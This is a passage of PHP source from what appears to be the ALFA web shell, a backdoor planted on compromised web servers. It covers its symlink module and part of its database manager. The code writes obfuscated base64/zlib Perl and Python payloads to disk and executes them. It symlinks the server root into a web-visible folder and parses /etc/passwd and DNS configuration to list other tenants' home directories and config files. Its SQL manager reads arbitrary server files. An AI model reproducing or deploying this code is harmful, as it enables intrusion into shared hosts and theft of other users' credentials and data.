  4242. echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symphp\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symperl\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'sympy\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a></h3></center>';
  4243. if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){
  4244. $sympath = alfaMakePwd();
  4245. @mkdir('cgihaxor',0755);
  4246. @chdir('cgihaxor');
  4247. alfacgihtaccess('cgi');
  4248. $perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;my $alfa_data="'.__ALFA_DATA_FOLDER__.'";eval(Compress::Zlib::memGunzip(decode_base64("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")));';
  4249. $py = '#!/usr/bin/python'."\nimport zlib, base64\nalfa_data='".__ALFA_DATA_FOLDER__."'\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
  4250. $cginame = "symperl.alfa";
  4251. $source = $perl;
  4252. $lang = "perl";
  4253. if($_POST["alfa2"]=="sympy"){
  4254. $cginame = "pysymlink.alfa";
  4255. $source = $py;
  4256. $lang = "python";
  4257. }
  4258. @__write_file($cginame,$source);
  4259. @chmod($cginame,0755);
  4260. echo __pre();
  4261. $resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);
  4262. if(strlen($resource) == 0){
  4263. echo AlfaiFrameCreator('cgihaxor/'.$cginame);
  4264. }else{
  4265. echo $resource;
  4266. }
  4267. }
  4268. if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){
  4269. if(function_exists('symlink')||_alfa_can_runCommand(true,true)){
  4270. AlfaNum(9,10);
  4271. echo __pre().'
  4272. <center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
  4273. <input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
  4274. <input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
  4275. <p><input type="submit" value=" " name="symlink" /></p></form></center>';
  4276. $path = $_POST['alfa5'];
  4277. $symname = $_POST['alfa6'];
  4278. $solevisible58 = $_POST['alfa7'];
  4279. if($solevisible58){
  4280. $new_name = str_replace(".", "_", basename($symname));
  4281. $rand_dir = $new_name.rand(111,9999);
  4282. $sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';
  4283. @mkdir($sym_dir, 0777, true);
  4284. alfacgihtaccess('sym', $sym_dir, $symname);
  4285. _alfa_symlink("$path","$sym_dir/$symname");
  4286. echo __pre();
  4287. echo '<center><b><font color="white">Click >> </font><a target="_blank" href="'.__ALFA_DATA_FOLDER__."/".$sym_dir.'" ><b><font size="4">'.$symname.'</font></b></a></b></center>';
  4288. }
  4289. }else{echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";}
  4290. }
  4291. if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){
  4292. $cant_symlink = true;
  4293. if(function_exists('symlink')||_alfa_can_runCommand(false,false)){
  4294. @mkdir('alfasymlink',0777);
  4295. alfacgihtaccess('sym','alfasymlink/');
  4296. _alfa_symlink('/','alfasymlink/root');
  4297. $table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
  4298. if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){
  4299. echo "<center>";
  4300. $lines = array();
  4301. $anony_domains = array();
  4302. $anonymous_users = array();
  4303. $f_black = array();
  4304. $error = false;
  4305. $anonymous = false;
  4306. $makepwd = "/home/{user}/public_html/";
  4307. $domains = alfaGetDomains();
  4308. $lines = $domains["lines"];
  4309. $state = $domains["state"];
  4310. $is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
  4311. $can_runcmd = _alfa_can_runCommand(false,false);
  4312. if(!$is_posix && !$can_runcmd){
  4313. $anonymous = true;
  4314. $anony_domains = $domains["lines"];
  4315. $lines = _alfa_file('/etc/passwd');
  4316. }
  4317. echo $table_header;
  4318. $count=1;
  4319. $template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="'.__ALFA_DATA_FOLDER__.'/alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
  4320. foreach($lines as $line){
  4321. $domain = "";
  4322. $owner = "";
  4323. if($anonymous){
  4324. $explode = explode(":", $line);
  4325. $owner = $explode[0];
  4326. $owner_len = strlen($owner) - 1;
  4327. $userid = $explode[2];
  4328. if((int)$userid < 500)continue;
  4329. $domain = "[?????]";
  4330. $temp_black = array();
  4331. $finded = false;
  4332. foreach($anony_domains as $anony){
  4333. if($state == "named.conf"){
  4334. if(@strstr($anony, 'zone')){
  4335. preg_match_all('#zone "(.*)"#',$anony, $data);
  4336. $domain = $data[1][0];
  4337. }else{
  4338. continue;
  4339. }
  4340. }elseif($state == "named" || $state == "valiases"){
  4341. if($anony == "." || $anony == "..")continue;
  4342. if($state == "named")$anony = rtrim($anony, ".db");
  4343. $domain = $anony;
  4344. }
  4345. $sub_domain = str_replace(array("-","."), "", $domain);
  4346. if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){
  4347. if(in_array($owner.$domain, $temp_black))continue;
  4348. $sympath = str_replace("{user}", $owner, $makepwd);
  4349. $http = "http://".$domain;
  4350. echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
  4351. $count++;
  4352. $temp_black[] = $owner.$domain;
  4353. $finded = true;
  4354. }
  4355. }
  4356. if(!$finded){
  4357. $anonymous_users[] = $owner;
  4358. }
  4359. }else{
  4360. if($state == "named.conf"){
  4361. if(@strstr($line, 'zone')){
  4362. preg_match_all('#zone "(.*)"#',$line, $data);
  4363. $domain = $data[1][0];
  4364. }else{
  4365. continue;
  4366. }
  4367. }elseif($state == "named" || $state == "valiases"){
  4368. if($line == "." || $line == "..")continue;
  4369. if($state == "named")$line = rtrim($line, ".db");
  4370. $domain = $line;
  4371. }
  4372. if(strlen(trim($domain)) > 2 && $state != "passwd"){
  4373. if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;
  4374. if($is_posix){
  4375. $user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));
  4376. $owner = $user["name"];
  4377. }elseif($can_runcmd){
  4378. $owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);
  4379. }
  4380. }
  4381. }
  4382. if(!$anonymous){
  4383. if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;
  4384. $sympath = str_replace("{user}", $owner, $makepwd);$http = "http://".$domain;
  4385. if($state == "passwd"){
  4386. $http = "javascript:alert('we cant find domain...')";
  4387. }
  4388. echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
  4389. $count++;
  4390. $f_black[] = $owner.$domain;
  4391. }
  4392. }
  4393. if($anonymous){
  4394. foreach($anonymous_users as $owner){
  4395. $sympath = str_replace("{user}", $owner, $makepwd);
  4396. $http = "javascript:alert('we cant find domain...')";
  4397. echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
  4398. $count++;
  4399. }
  4400. }
  4401. $cant_symlink = false;
  4402. }else{
  4403. $is_direct = false;
  4404. $makepwd = alfaMakePwd();
  4405. if(_alfa_file_exists("/etc/virtual/domainowners")){
  4406. $makepwd = "/home/{user}/public_html";
  4407. $is_direct = true;
  4408. }
  4409. $sole = _alfa_file("/etc/virtual/domainowners");
  4410. $count=1;
  4411. echo $table_header;
  4412. $template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="'.__ALFA_DATA_FOLDER__.'/alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
  4413. if($sole){
  4414. foreach($sole as $visible){
  4415. if(@strstr($visible,":")){
  4416. $solevisible = explode(':', $visible);
  4417. $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
  4418. echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
  4419. }
  4420. }
  4421. }else{
  4422. $passwd = _alfa_file("/etc/passwd");
  4423. if($passwd){
  4424. $html = "";
  4425. $is_named = false;
  4426. $users = array();
  4427. $domains = array();
  4428. $uknowns = array();
  4429. foreach($passwd as $user){
  4430. $user = trim($user);
  4431. $expl = explode(":", $user);
  4432. if((int)$expl[2] < 500)continue;
  4433. $users[$expl[0]] = $expl[5];
  4434. }
  4435. $site_domains = @scandir("/etc/virtual/");
  4436. if(!$site_domains){
  4437. $site_domains = alfaEx("ls /etc/virtual/");
  4438. $site_domains = explode("\n", $site_domains);
  4439. if(!$site_domains){
  4440. $site_domains = _alfa_file("/etc/named.conf");
  4441. if($site_domains){$is_named = true;}
  4442. }
  4443. }
  4444. foreach($site_domains as $line){
  4445. if($is_named){
  4446. if(@strstr($line, 'zone')){
  4447. preg_match_all('#zone "(.*)"#',$line, $data);
  4448. $domain = $data[1][0];
  4449. if(strlen($domain > 2) && !empty($domain)){
  4450. $domains[] = $domain;
  4451. }
  4452. }
  4453. }else{
  4454. $domains[] = $line;
  4455. }
  4456. }
  4457. $x = 1;
  4458. foreach($users as $user => $home){
  4459. foreach($domains as $domain){
  4460. $user_len = strlen($user) - 1;
  4461. $sub_domain = str_replace(array("-","."), "", $domain);
  4462. $five_user = substr($user, 0,$user_len);
  4463. $five_domain = substr($sub_domain, 0,$user_len);
  4464. if($five_user == $five_domain){
  4465. if($is_direct){
  4466. $cwd = str_replace("{user}", $user, $makepwd);
  4467. }else{
  4468. $expl = explode("}/", $makepwd);
  4469. $cwd = $home."/".$expl[1];
  4470. }
  4471. $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
  4472. }else{
  4473. $uknowns[$user] = $home;
  4474. }
  4475. }
  4476. }
  4477. $uknowns = array_unique($uknowns);
  4478. foreach($uknowns as $user => $home){
  4479. if($is_direct){
  4480. $cwd = str_replace("{user}", $user, $makepwd);
  4481. }else{
  4482. $expl = explode("}/", $makepwd);
  4483. $cwd = $home."/".$expl[1];
  4484. }
  4485. $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
  4486. }
  4487. echo($html);
  4488. }
  4489. }
  4490. echo "</table>";
  4491. $cant_symlink = false;
  4492. }
  4493. }else{
  4494. echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
  4495. $cant_symlink = false;
  4496. }
  4497. if($cant_symlink)echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
  4498. echo "</center></table>";
  4499. }
  4500. echo "</div>";
  4501. alfafooter();
  4502. }
  4503. function alfasql(){
  4504. class DbClass{
  4505. public $type;
  4506. public $link;
  4507. public $res;
  4508. public $mysqli_connect_error = false;
  4509. public $mysqli_connect_error_msg = "";
  4510. function __construct($type){
  4511. $this->type = $type;
  4512. }
  4513. function connect($host, $user, $pass, $dbname){
  4514. switch($this->type){
  4515. case 'mysql':
  4516. if($this->link = @mysqli_connect($host,$user,$pass,$dbname)){
  4517. return true;
  4518. }else{
  4519. $this->mysqli_connect_error = true;
  4520. $this->mysqli_connect_error_msg = mysqli_connect_error();
  4521. return false;
  4522. }
  4523. break;
  4524. case 'pgsql':
  4525. $host = explode(':', $host);
  4526. if(!$host[1]) $host[1]=5432;
  4527. if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
  4528. break;
  4529. }
  4530. return false;
  4531. }
  4532. function selectdb($db){
  4533. switch($this->type){
  4534. case 'mysql':
  4535. if(@mysqli_select_db($db))return true;
  4536. break;
  4537. }
  4538. return false;
  4539. }
  4540. function query($str){
  4541. switch($this->type){
  4542. case 'mysql':
  4543. return $this->res = @mysqli_query($this->link,$str);
  4544. break;
  4545. case 'pgsql':
  4546. return $this->res = @pg_query($this->link,$str);
  4547. break;
  4548. }
  4549. return false;
  4550. }
  4551. function fetch(){
  4552. $res = func_num_args()?func_get_arg(0):$this->res;
  4553. switch($this->type){
  4554. case 'mysql':
  4555. return @mysqli_fetch_assoc($res);
  4556. break;
  4557. case 'pgsql':
  4558. return @pg_fetch_assoc($res);
  4559. break;
  4560. }
  4561. return false;
  4562. }
  4563. function listDbs(){
  4564. switch($this->type){
  4565. case 'mysql':
  4566. return $this->query("SHOW databases");
  4567. break;
  4568. case 'pgsql':
  4569. return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
  4570. break;
  4571. }
  4572. return false;
  4573. }
  4574. function listTables(){
  4575. switch($this->type){
  4576. case 'mysql':
  4577. return $this->res = $this->query('SHOW TABLES');
  4578. break;
  4579. case 'pgsql':
  4580. return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
  4581. break;
  4582. }
  4583. return false;
  4584. }
  4585. function error(){
  4586. switch($this->type){
  4587. case 'mysql':
  4588. return @mysqli_error($this->link);
  4589. break;
  4590. case 'pgsql':
  4591. return @pg_last_error();
  4592. break;
  4593. }
  4594. return false;
  4595. }
  4596. function setCharset($str){
  4597. switch($this->type){
  4598. case 'mysql':
  4599. if(function_exists('mysql_set_charset'))
  4600. return @mysqli_set_charset($this->link,$str);
  4601. else
  4602. $this->query('SET CHARSET '.$str);
  4603. break;
  4604. case 'pgsql':
  4605. return @pg_set_client_encoding($this->link, $str);
  4606. break;
  4607. }
  4608. return false;
  4609. }
  4610. function loadFile($str){
  4611. switch($this->type){
  4612. case 'mysql':
  4613. return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
  4614. break;
  4615. case 'pgsql':
  4616. $this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;");
  4617. $r=array();
  4618. while($i=$this->fetch())
  4619. $r[] = $i['file'];
  4620. $this->query('drop table solevisible');
  4621. return array('file'=>implode("\n",$r));
  4622. break;
  4623. }
  4624. return false;
  4625. }
  4626. };
  4627. $db = new DbClass($_POST['type']);
  4628. alfahead();
  4629. $form_visibility = "table";
  4630. if(isset($_POST['sql_host'])){
  4631. $connection_db = $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
  4632. if($connection_db && !empty($_POST['sql_base'])){
  4633. $form_visibility = "none";
  4634. }
  4635. }
  4636. $database_list = array();
  4637. echo "
  4638. <div class='header' style='min-height:300px;'>".($form_visibility!="none"?"<center><div class='txtfont_header'>| Sql Manager |</div><p>".getConfigHtml('all')."</p></center><div style='text-align:center;margin-bottom: 10px;'><button class='connection-his-btn db-opt-id' onclick='alfaShowConnectionHistory(this);' mode='on'>Connection History</button><div class='connection_history_holder'></div></div>":"")."
  4639. <div class='sf' class='db-opt-id'><table style='margin: 0 auto;".($form_visibility=="none"?"display:none;":"")."' cellpadding='2' cellspacing='0'><tr>
  4640. <td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
  4641. <td><select name='type'><option value='mysql' selected>mysql</option></select></td>
  4642. <td><input type='text' name='sql_host' id='db_host' value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
  4643. <td><input type='text' name='sql_login' id='db_user' value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
  4644. <td><input type='text' name='sql_pass' id='db_pw' value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
  4645. $tmp = "<input type='text' name='sql_base' id='db_name' value='". (empty($_POST['sql_base'])?'':htmlspecialchars($_POST['sql_base'])) ."'>";
  4646. if(isset($_POST['sql_host'])){
  4647. if($connection_db){
  4648. $db->setCharset('utf8');
  4649. $db->listDbs();
  4650. echo "<select name=sql_base><option value=''></option>";
  4651. while($item = $db->fetch()) {
  4652. list($key, $value) = each($item);
  4653. $database_list[] = $value;
  4654. echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
  4655. }
  4656. echo '</select>';
  4657. }else{
  4658. echo $tmp;
  4659. }
  4660. }else
  4661. echo $tmp;
  4662. $curr_mysql_id = $_POST['current_mysql_id'];
  4663. echo "</td>
  4664. <td><button onclick='fs(this);return false;' class='db-opt-id db-connect-btn'>Connect</button></td>
  4665. <td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
  4666. </tr>
  4667. </table>";
  4668. if($db->mysqli_connect_error){
  4669. echo '<div style="text-align: center;font-size: 17px;margin-top: 18px;">'.$db->mysqli_connect_error_msg.'</div>';
  4670. }
  4671. if(!empty($curr_mysql_id)){
  4672. $sql_title_db = "";
  4673. if(!empty($_POST['sql_base'])){
  4674. $sql_title_db = "d.querySelector('#tab_".$curr_mysql_id." span').innerHTML='".addslashes($_POST['sql_base'])."';";
  4675. }
  4676. echo "<script>mysql_cache['".$curr_mysql_id."']['host']='".addslashes($_POST['sql_host'])."';mysql_cache['".$curr_mysql_id."']['user']='".addslashes($_POST['sql_login'])."';mysql_cache['".$curr_mysql_id."']['pass']='".addslashes($_POST['sql_pass'])."';mysql_cache['".$curr_mysql_id."']['db']='".addslashes($_POST['sql_base'])."';mysql_cache['".$curr_mysql_id."']['charset']='".addslashes($_POST['charset'])."';mysql_cache['".$curr_mysql_id."']['type']='".addslashes($_POST['type'])."';mysql_cache['".$curr_mysql_id."']['count']='".addslashes($_POST['sql_count'])."';".$sql_title_db."alfaConnectionHistoryUpdate();</script>";
  4677. }
  4678. if(isset($db) && $db->link){
  4679. if(!empty($_POST['sql_base'])){
  4680. echo "<div class='mysql-main'><div mode='block' onclick='alfaMysqlTablePanelCtl(this);' class='tables-panel-ctl db-opt-id'>&#x3C;&#x3C;</div><div class='mysql-tables'><div><input placeholder=\"Filter Table\" style='padding: 0;margin-left: 11px;text-align:center;' type='text' name='filter_all'><button class='db-opt-id' onclick='alfaMysqlFilterAllTable(this);return false;'>Search</button></div><div class='block'><a sql_count='".(empty($_POST['sql_count'])?"false":"true")."' mode='closed' onclick='alfaMysqlFilterAllTable(this,true);' class='expander parent-expander db-opt-id' href='javascript:void(0);'><img src='http://solevisible.com/icons/menu/b_plus.png' title='Expand/Collapse All DataBases' alt='Expand/Collapse All DataBases'></a></div><ul style='margin-top: 28px;'>";
  4681. foreach ($database_list as $db_name) {
